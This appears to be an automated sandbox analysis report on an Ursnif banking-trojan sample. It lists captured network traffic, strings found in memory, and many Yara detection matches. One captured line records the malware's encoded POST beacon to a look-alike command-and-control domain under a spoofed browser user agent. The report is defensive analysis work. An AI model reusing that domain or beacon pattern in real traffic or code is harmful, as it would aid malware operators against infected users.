                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Oct 2021 23:34:10 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms" equals www.facebook.com (Facebook)
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms" equals www.twitter.com (Twitter)
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpString found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms" equals www.youtube.com (Youtube)
                      Source: RuntimeBroker.exe, 0000002E.00000002.1187598445.000001B4FB0D0000.00000004.00000001.sdmpString found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"" equals www.facebook.com (Facebook)
                      Source: RuntimeBroker.exe, 0000002E.00000002.1187598445.000001B4FB0D0000.00000004.00000001.sdmpString found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"" equals www.twitter.com (Twitter)
                      Source: RuntimeBroker.exe, 0000002E.00000000.997126395.000001B4FB0C4000.00000004.00000001.sdmpString found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"uired":false}" equals www.facebook.com (Facebook)
                      Source: RuntimeBroker.exe, 0000002E.00000000.997126395.000001B4FB0C4000.00000004.00000001.sdmpString found in binary or memory: "Love music? Play your favorite songs and albums free on Windows 10 with Spotify.\r\n\r\nStream the tracks you love instantly, browse the charts or fire up readymade playlists in every genre and mood. Radio plays you great song after great song, based on your music taste. Discover new music too, with awesome playlists built just for you.\r\n\r\nStream Spotify free, with occasional ads, or go Premium.\r\n\r\nFree:\r\n" Play any song, artist, album or playlist instantly\r\n" Browse hundreds of readymade playlists in every genre and mood\r\n" Stay on top of the Charts\r\n" Stream Radio \r\n" Enjoy podcasts, audiobooks and videos\r\n" Discover more music with personalized playlists\r\n \r\nPremium:\r\n" Download tunes and play offline\r\n" Listen ad-free\r\n" Get even better sound quality\r\n" Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify"uired":false}" equals www.twitter.com (Twitter)
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpString found in binary or memory: Find us: www.facebook.com/HiddenCityGame equals www.facebook.com (Facebook)
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpString found in binary or memory: Follow us: www.twitter.com/g5games equals www.twitter.com (Twitter)
                      Source: RuntimeBroker.exe, 0000002E.00000000.997237662.000001B4FB11D000.00000004.00000001.sdmpString found in binary or memory: Like us on Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)
                      Source: RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpString found in binary or memory: Watch us: www.youtube.com/g5enter equals www.youtube.com (Youtube)
                      Source: unknownHTTP traffic detected: POST /oFicZj5usGm_2B0NL9gZLV/ZUmxvOk6Hl7SJ/EDK5fPOS/8bJn0oEKBXyaI_2FgFLHjIr/vR9EgPr9iZ/BsHMBlv9QxRTJNREz/mACP3yGg7skY/_2FdZEJn_2F/IV2mBc0GG_2FvT/53lPOvidBB1fn_2FI5kxG/suo5_2BB8niHf2Ry/rgnjnl9X_2F6HZr/tIOdn9dPOC7f1v8Cp_/2FP4dNfA6/YXJeUCPB5E1QadP6XZ0Z/70c_2FO_2BuW1MJ1FGY/r27cnguDBgf94rw_2FDi4i/aJyUeDcmN8xPq/7e51fVNw/PYHU8eZ8MJvwfaAYDz_2Fvf/Qi7bVln3AU/Hyoo0rU5uWfSrP9FI8hAt/b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
                      Source: Yara matchFile source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
